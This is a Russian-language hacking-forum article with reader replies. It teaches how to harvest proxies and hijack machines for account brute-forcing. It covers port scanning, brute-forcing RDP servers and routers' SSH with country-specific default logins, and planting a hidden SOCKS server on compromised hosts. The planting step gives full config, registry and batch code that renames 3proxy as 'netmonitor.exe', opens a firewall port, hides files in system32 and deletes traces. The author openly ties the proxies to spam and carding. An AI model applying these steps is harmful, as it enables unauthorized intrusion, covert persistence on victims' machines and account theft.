Как добывать прокси

Тема в разделе "Статьи", создана пользователем Centr, 1 июн 2015.

  1. TopicStarter Overlay
    Centr

    Centr Команда форума

    Вообще, от того, какие прокси Вы используете зависит весь вашдальнейший успех брута так сказать.
    Скажу по опыту, самые лучшиепрокси-покупные.
    Ни одни паблик-прокси, сколько бы их не было, незаменят Вам те что вы купите и будете пользоваться практически одни.

    Я всегда покупаю прокси тут:

    Для больших объемов брута нужно около 1000 проксей. Но одно времямне хватало 350 штук.

    Однако собственно купить прокси вы можете и без меня. А вот какдостать себе пару миллионов прокси? Неплохо было бы верно? Хоть эти
    пркси и паблик, они все же отслужат хорошую службу Вам.

    Здесь все предельно просто. Мы просто будем собирать проксиграббером.

    Но у нас будет целых 4800 ссылок для граббинга!Открываем программу Proxy Graber и видим следующее:

    [​IMG]

    Данный граббер предельно прост, понятен и работоспособен.
    Слевапри нажатии 1 из 3 кнопок слева выбирается тип проксей для парсинга.

    При нажатии на кнопку «Links» открывается окно

    [​IMG]

    В этом окне и будет осуществляться весь граббинг.
    Слеваотображаются собранные прокси, справа — ссылки, откуда софт их собирает. В папке Вы найдете текстовый документ со ссылками для
    граббинга проксей. Их там 4825 штук, внушительное количество. В
    самом софте уже есть пара десяток ссылок, с них вы сможете собрать
    20-30 тысяч прокси, не более, тем более таких-же собирателй как вы
    сотни, поэтому эти прокси заезжены и забаненны вконтакте в
    большинстве случаев. Позже расскажу как их прочекать. А пока вставим
    в граббер, в правый столбец наши ссылки из документа и оставим
    грабить на 5-7 часов.

    За одну ночь у меня софт собрал такое количествоHTTP проксей:

    [​IMG]

    Если быть точнее, то 4 миллиона 263 тысячи 396 проксей. Но они непрочеканны, большая часть из них не работает. Для этого случая есть
    другая программа, Proxy Сhecker. Важной особенностю в софте является
    что можно не просто проверить прокси на работоспособность, а
    проверить именно на конкретном рескрсе. Дело в том, что
    большинство чекеров прокси проверяют работоспособность серверов
    на яндексе/гугле, но нам это не подо\ходит, так как один и то же
    прокси-сервер может работать на яндексе, но быть забаненым
    Вконтакте. Данный же софт проверяет на конечный нужный ресурс.
    Ниже объясню как это организовать.

    При запуске Вы увидите такое окно:

    [​IMG]

    В левый крайний столбик копируете ваши награбленные прокси, еслиэто прокси вида SOCKS5, то жмете галочку сверху. Ставите 100 потоков.
    Таймаут можете не трогать, в поле «обращаться к» пишите «Vk.com», в
    поле «искать в контенте» так же «Vk.com»
    Если же Вы брутите origin, либо вообще любой другой ресурс
    соответственно проверяйте прокси именно на этот ресурс.
    И запускаете софт, оставив его в покое на несколько часов. Он будет
    писать в столбике валидных прокси только те, что смогли подключиться
    к Vk.com(либо заданному Вами ресурсу).

    Работа софта выглядит воттак:

    [​IMG]

    Эта программа не такая шустрая как предыдущая поэтому ейпотребуется немало времени чтобы прочекать все прокси. Но все же
    оно того стоит, по прошествии 8-10 Вы получите ооочень внушительный
    список прокси для брута.

    Но конечно же паблик проксям, хоть и собранным с такого огромногоколичества ссылок лучше предпочитать прокси(а в дальнейшем и
    дедики) добытые лично своими руками, чтобы , во-первых,
    гарантировать своим проксям приватность, а во вторых обеспечить им
    долгий срок службы, ибо прокс добытые совими руками куда лучше тех
    что продают селлеры.
    Купить, конечно же проще, за 1000 рублей ты купишь 2-3 тысячи проксей, но все же это будут прокси которыми кроме тебя пользуется
    еще 10-20-100 а возможно и больше человек, поэтому в любом случае
    нужно уметь самому добывать прокси, дедики, а так же подключаться к
    роутерам!

    Итак, начнем. Самое первое что мы должны сделать для того чтобыполучить свои приветные прокси, это так называемое сканирование
    портов.

    Сканирование портов — говоря простыми словами, это поиск такихкомпьютеров, у которых открыт определенный порт. Поиск конечно же
    не ручной, с помощью специального софта, который анализирует
    заданный пользователем диапазон IP адресов , на которых, в свою
    очередь, ищутся открытые порты.

    Диапазоны IP адресов классифицируются по странам(Ну так же и порегионам, штатам, городам) коим они принадлежат. Поэтому указывая
    при сканировании определенный диапазон, мы будем проверять
    конкретную страну(либо регион, город, в зависимости от заданного
    диапазона)

    Так как наш софт работает по протоколу API, нам не обязательнодостать именно Российские прокси. Можно доставать любые, хоть с
    Папуа-Гвинея =) А поэтому не будем сильно заморачиваться и
    сканировать Российские диапазоны, а будем брать то, что легче всего
    достать. Не зря есть поговорка «Бери то что под рукой и не ищи себе
    другого».

    А собственно, как же мы будем искать эти самые диапазоны?

    Тут естьнесколько вариантов:

    1)Специальный софт. Называется он IP City. Данная программаспециально создана для нужд таких нехороших людей как мы с Вами))
    Но я не советую ее использовать, так как все диапазоны в ней уже
    просканированны сотни раз такими же искателями личных приватных
    проксей, и я лично не стал бы сканировать то что давно уже
    используется кем то другим.

    2) Воспользоваться сайтами, которые в онлайн-режиме предоставляютвыборку IP-диапазонов по странам.

    В поисковых запросах яндекса и угла еще десятки таких ресурсов,думаю найти не составит труда=)
    Итак, у нас появилась выборка IP адресов формате 11.0.0.0-
    13.255.255.255, удобнее будет скопировать все это в текстовик чтобы не
    потерять.

    Определение порта для сканирования.

    От того что ты будешь сканировать зависит выбор порта. Напримересли собрался сканировать дедики, то знай, что удаленный рабочий
    стол использует порт 3389, именно его ты будешь указывать в
    настройки при сканировании. Если же тебе нужны проски(а я
    рекомендую тебе искать Sоcks прокси), то самый часто встречающийся
    потр на соксах это 1080. Однако многие соксы могут открываться и на
    других потрах, вот список наиболее частых:
    Код:
    1080,1032,1924,1978,2081,2827,4160,4207,4471,4537,4954,5015,5057,5337,5443,5498,5630,5679,5718,5871,6032,6087,6159,6171,6292,6560,6896,7014, 71
    55,7166,7209,7596,7758,7770,7824,8065,8486,8544,8984,9366,9560,9617,97
    26,9998,10798,11218,11480,11839,11903,12165,12429,12721,12794,12994,1327
    3,15481,15621,15979,16120,16717,17040,17702,17773,18449,18924,19787,2031
    8,20399,20582,21514,21679,21705,21984,22346,22623
    И так далее, те порты что идут далее до 55412 уже менееперспективны.

    Сканирование портов
    Что-ж, данные для сканирования у нас есть, думаю можно и начать.

    1.Для начала нужно подключить компьютер к VPN-сервису, это делатьобязательно!

    2.Подключившись к VPN, обязательно еще подключись к дедику,именно так и никак иначе!

    3. Запускаете программу KportScan 3.0 (найдете в папке)С ВПН все ясно.

    А вот дедик лучше покупать той страны/региона по которому будет идти сканирование. Но впринципе это вовсе необязательно, лишь желательно. Что касается конфигурации, то
    понадобится довольно-таки мощный дедик, с хорошим каналом
    интерента.

    Саму программу и все файлы желательно на деде прятать кудаподальше, в папку C/Windows/System32 и туда куда нибудь поглубже.
    Потому как наврядли туда заберется юзер и будет там что то
    вынюхивать

    Думаю что с интерфейсом программы проблем не будет, но все жераспишу что к чему.

    Theards — тут указывают количество IP, сканирующихся одновременно.Этот параметр зависит от скорости интернета Вашего дедика и его
    конфигов, то есть на слабом дедике много потоков не выйдет запускать.
    Рекомендую ставить 300 - 500 потоков.

    Port — Здесь указывается порт для сканирования. Как помнишь, длясоксов и дедиков абсолютно разные порты.

    With port – Ели нужны соксы то софт пишет их сюда(файл IP:port)

    Without port — Если нужны дедики, софт пишет их сюда(толькоайпишники)

    Append to file — добавляет результаты нового сканирования ирезультирующий файл к предыдущему, находящимся в файле, без его
    переписывания.

    Fast stop — моментальная остановка сканирования.

    Slow stop – досканирует диапазон, только затем останавливается.

    Все готово, осталось лишь дождаться окончания сканирования!Теперь все результаты нашего сканирования записаны в файле resuilt.txt

    А собственно для чего мы проделали эту работу? А для того чтобыузнать, что на IP, которые записаны в нашем результирующем файле
    открыт порт. Который ты указывал при сканировании. То есть половина работы уже сделана. Осталось лишь проверить данный список IP:port
    на работоспособность и рассортировать по типам полученных прокси

    Для этого воспользуйся программой DiChecker.Копируй туда свой список, отмечай нужные тебе типы прокси и запскай,
    на выходе получишь уже готовый список проксей нужного вида!

    С прокси мы разобрались, разберемся теперь с дедиками. Если тысканировал на порт 3389 значит тебе определенно нужны именно
    дедики! По окончании сканирования у тебя будет просто список нужных
    IP — адресов.

    Но ведь это всего - лишь список компьютеров, готовых работать черезудаленный рабочий стол, а значит для того чтобы нам к ним
    подключиться понадобятся логины и пароли. Поэтому мы и запустим
    брут для дедиков.
    Чем дедики брутить легче, чем социальные сети к примеру? А тем, что
    администраторы, чаще всего, выставляют очень уж простые логины и
    немногим сложнее пароли. (логины admin, administrator пароли admin,
    pass, password)

    Для брута дедиков даже есть специальные словарилогинов:паролей

    В нашу программу нужно загрузить всего-лишь 3 файла, а именно:

    1) Список своих отсканированных первой программой IP адресов безуказания потра.
    2) Список логинов 3) Список паролей
    3) Список паролей

    По окончании брута, ты увидишь 2 текстовых файла, Good.txt и Bad.txt. Вфайле good буутте IP адреса, к которым подошла заданная паралогин:пароль, впринципе все как и в обычном бруте. В файле bad будутвсе остальный айпи, к которым не удалось подобрать пару логин:пароль

    Программа, используемая для брута дедиков называетс DuBrute, думаюмногие уже где-либо слышали о ней

    Открываем и видим данное окошко:

    [​IMG]

    Как Вы уже поняли, нам нужна вкладка “Generate” нажав на нее,попадаем сюда:

    [​IMG]

    Все эти поля мы должны заполнить.

    Смотрим скрин ниже куда нажимать, при нажатии на эти кнопки нужнобудет выбрать текстовые файлы с IP, логинами и паролями,
    соответственно для каждой вкладки.

    [​IMG]

    Все выбрали, жмем Make, генератор составить нам соурс для брута,переходим в поле confiig:

    [​IMG]

    Потоки рекомендую урезать до 200-400, дабы не загружать ЦП дедика,параметр Try connections задает количество попыток подключения к
    дедику, если выставить большую цифру, окончания брута придется
    ждать довольно долго! Поэтому ставь не больше 5.

    Собственно все, жми старт и иди гулять, пить чай или что-либо еще, поокончании брута увидишь список готовых к подключению дедиков=)

    Мы поговорили про техническую часть, но не затронули так называемую«социальную»
    Исправим это.

    Как ты могу заметить, при выборе диапазонов сканирования, мы могливзять множество разных стран, а что самое важно, такое же множество
    языков, наречий и даиаектов! О чем это я? Да о том что если ты будешь
    брутить российсккие диапазоны паролями «админ, administrator» то брут
    будет более-менее успешен. А вот если взять диапазоны США и брутить логином «админ» то не думаю что чего-либо добьешься)) Но это пример
    лишь 2 стран, а при сканировании мы могли взять множество стран! К
    примеру, Испния. Очень сомневаюсь что логины и пароли у них стоят
    английские. Поэтому тебе нужны самые что ни на есть испанские логины
    и пароли! Как этого добиться? Просто! При сканировании отделяй
    каждую страну отдельно, а затем, при бруте дедиков, по каждой стране
    делай свои список логинов и паролей. Найти их не сложно, нужно лишь
    зайти в Google.translate и перевести наши често встречающиеся слова на
    заданный язык. Ниже я все же предоставлю список логинов некоторых
    стран

    Австрия, Великобритания, США, Норвегия,Хорватия - Admin,Administrator

    Австрия, Германия, Швейцария, Бельгия - Verwalter, Verwaltungsbeamte

    Болгария - Управител, Администратор, РъководителДания - Bestuurder, Bewindvoerder

    Италия, Швейцария - Addetto, Responsabile, Amminiatratore

    Испания, Португалия - AdministratrЛатвия - Administrator

    Литва - Administratorius

    Нидерланды, бельгия - Administrateur, Beheerder, Bewindvoerder

    Польша - Administrator, Glowny Zarzadea, Rzadca

    Что же касается паролей, то тут можно пойти двумя путями:

    1) Не заморачиваясь, взять пароль «123456» или что-то в этом роде,подходящее для многих стран. Ведь во всей Европе используется
    арабский циферный алфавит, а значит в каждой стране наверняка
    найдутся те, кто ставит циферные, обычные пароли.

    1) Заморочиться, подумать, и насобирать паролей, соответствующихнациональной специфике страны, диапазоны которой ты сканировал, а
    затем брутил. Ведь не зря я тебе ранее говорил, при выборе диапазона для сканирования, нужно обязательно раделять их на страны. Опять —
    же для того чтобы наиболее продуктивно собрать оттуда базу. Другими
    словами, очень хорошо когда у тебя есть, предположим, десяток
    диапазонов разных стран. К примеру один из диапазонов -только
    Германия. В таком случае тебе не нужно придумывать пароли
    универсальные, подходящие под многие страны, например состоящие
    из цифер, а можно брать пароли из немецкого языка. Те же слова
    «Verwalter», «Verwaltungsbeamte» могут использоваться как в виде логинов,
    так и в виде паролей.
    То есть тутглавное включить голову. Этим самым мы себя обеспечим
    приватными дедиками/соксами

    Собственно после того как мы насобирали сксов/дедиков, у наспоявляется резонный вопрос, как защититься от повтроного
    сбручивания? Тут есть несколько решений на самом деле.

    1) Не дергаться и радоваться тому что есть.

    Мне нравиться одна поговорка, которая звучит так: "Бери то что подрукой, и не ищи себе другого" Другими словами, мы итак неплохо
    побрутили, собрали для себя можно сказать приватных дедиков и
    проксей, чего еще нужно для счастья? Пользуемся тем что есть.

    2) Тут уже интереснее, предлогаю из набрученных дедиков сделать себеприватных, уникальных сокс-серверов. Звучит круто, верно? То есть об
    этих соксах кроме тебя и знать то никто не будет, ибо делал ты их сам.
    Соответственно и логин:пароль для этого сокса ты можешь выбрать
    такой, который в жизни потом не сбрутят, а ты его знать будешь.

    Приступаем к работе.

    1. Находишь в приложении к мануалу папку 3Proxy (Антивирус можетругаться на файлы, но для программ такого класса это в порядке вещей)

    2. В папке найди файл 3proxy.exe он находится в папке BIN. Этот файлскопируй в отдельную папку и переименуй его в netmonitor.exe

    3. В папке с переименованной программе нужно создать конфигурационный файл, для создавай новый текстовый документ, икопируй туда следкующий код:
    Код:
    users login:CP:password
    auth strong
    socks -p1080 -a
    ВНИМАНИЕ! Вместо login и password - логин и пароль, какие ты хочешь, нонужно ставить сложные, и записывать, чтобы никто не сбрутил и ты не забыл.
    Теперь выбирай Файл-> Сохранить как, для типов ставишь "Все", название
    должно быть comand.drv.

    4. Теперь нужно создать еще один текстовый документ, и скопироватьтуда следующую запись:
    Код:
    Windoes Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Micosoft\Windows
    \CurrentVersion\Run]
    "netmonitor"="\"C:\\Windows\\system32\\netmonitor.exe
    command.drv\""
    Теперь снова как и раньше сохраняешь, только имя ставь "st.reg"

    5. Ну и еще один текстовый файлик нам понадобиться. Опять-же,копируй в него код:
    Код:
    netsh firewall add portopening TCP 1080 systemattrib +r +h +s C:\\Windows\system32\netmonitor.exe
    attrib +r +h +s C:\\Windows\system32\comand.drv
    reg impost st.reg
    regedit /s st.reg
    start svehost.exe comand.drv
    del %SystemRoot%\system32\st.reg /f
    del %SystemRoot%\system32\setup. /f
    Значит, первая строка открывает порт для сокса 1080, вторые 2 делаютневидимымитвои файлы сервера, 4 и 5 строка прописывают
    необходимую информацию в реестере дедика. 6 строка запускает сам
    сервер, последние строки подчищают все следы за тобой.
    Опять же все это дело надобно сохранить, как и прежде, только
    название выбираешь "setup.bat"
    Все, отлино, проделана большая работа. Осталось все это дело
    хорошенько припрятать. То есть берем ВСЕ 4 ФАЙЛА, а именно
    netmonitor.exe, comand.drv, st.reg, setup.bat и прячем где-нибудь и
    прячем их где нибудь далеко на дедике который предпологается юзать)
    Например в директории C/Windows/system32.

    6. Осталось запустить setup.bat, который в свою очередь запустит всеостальное, так как он и есть исполняемый файл)))

    Все готово, получается теперь ты сам умеешь настраивать себе личныеприватные socks-сервера, которые будут жить вечно, не боясь что их
    сбрутят или еще что то. Ибо о существовании этого сокса знаешь только
    ты. И пароль надеюсь ты ставил мудреный)))
    К слову чказать, такие соксы даже жалко под спам использовать, с них
    можно совершать куда более прибыльную деятельности, взять хотябы
    тот-же карж. Но мануал не об этом)
    Мы не рассмотрели последнюю сложную часть статьи, а именно
    подключение через роутеры

    Надеюсь объяснять что такое роутеры не нужно)) Мы можемиспользовать их так-же как и дедики для добычи приватных соксов. И
    они будут даже лучше чем соксы с дедиков, за счет свойств самих
    роутеров. А именно, они будут куда быстрее и безопаснее)

    1) Для начала нам нужно проделать, что мы уже умеем а именносканирование портов. Так же определяй, диапазон для страны/региона
    и сканируй, но только на 22 порту, ибо роутеры подключаются именно
    через этот порт

    2) Роутеры, как и дедики, имеют пароли, которые мы должны сбрутить.

    С этим процессовм ты уже тоже знаком, просто делай так же как и прибруте дедиков. Изменяться лишь некоторые детали и программа.
    Для брута роутеров все крутые чуваки используют прорамму SSH
    Brutoforce, которую ты найдешь в соответствующей папке.
    Хотел бы отметить так-же, что при бруте роутеров часто не нужно
    извращаться с логинами и паролями. Дело в том что произодители на
    роутеры ставят просенькие пароли, а пользователи их очень редко
    меняют. Поэтому логин и пароль используем что то вроде "root:admin" и
    "admin:admin"
    Если хотите найти больше логинов и паролей, введите в гугль запрос. И
    помним что для каждой страны запрос долен соответствовать))
    например для Великобритании и США будет достаточно ввести "router
    default password list" а вот например для Испании запрос будет
    совершенно иным,а именно "router por defecto la lista de contraseñas"
    То есть креативьте, включайте голову)

    [​IMG]

    Так выглядит программа после открытия. Выставляй настройки как уменя на скрине.

    Теперь нам понадибиться еще одна программа, а именно BitviseTunnelier

    В Поле Host вводи нужный насканированный IP, Username - вписывайлогин, Initial method - выбираешь password и пишешь нужный пароль,
    затем жми Login.

    [​IMG]

    Нам нужно сделать из роутера сокс-сервер, для этого переходи навкладку Servers.

    Нужно поставить галоску напротив SOCKS/HTTP Proxy Forwarding.

    [​IMG]

    Собственно все, ничего в этом сложного нет=) Раота конечно рутинная,но оно того стоит, учитывая факт что приватные соксы сейчас стоят
    крайне дорого. Тебе одному решать как использовать их дальше,
    пустить ли на спам или брут, либо же заниматься чем-то еще. Но факт
    есть факт, я полностью объяснил тебе как добываются все расходные
    ресурсы для брута, и даже более. Теперь, когда ты умеешь такое,
    запустить брутофорс и собрать акков тебе не составит труда)) При чем
    не важно что это будет, Steam или аккаунты Brazzers.com Но все-же на
    примере Вк объясню что к чему, но не буду на этом сильно заострять
    внимание)
     
  2. Очень интересная статья спасибо автору !!!! Но если честно то иногда проше купить проксей при том что стоят они не так дорого да и кто знает что там за прокси, ведуться ли логи и не выдадут ли тебя при первом же запросе органов с потрахами !
     
  3. Для серфа мона и скачки не спорю способ оптимальный но речь заходит о более или менее серьёздных вечах когда речь уже конкретно заходит о твоей безопасности и могут за это взять за попу если на проксе ведуться логи подключений вычеслить твой риал ип не составит труда !!
     
  4. Автору нессомнено плюс за эту статью! но вот до меня не доходит как этим прокси (запароленные) в брутер или спемар запихнуть???
     
  5. Ну по идее в программе должна присутствовать функция работы с прокси, требующими авторизацию, хотя большинство программ подобного рода заточены под прокси, не требующих авторизации.
     
  6. Не легче грабить прокси с сайтов и проверять их на рабочесть?
     
  7. А кто навязывает? Кому как удобней.
     

Поделиться этой страницей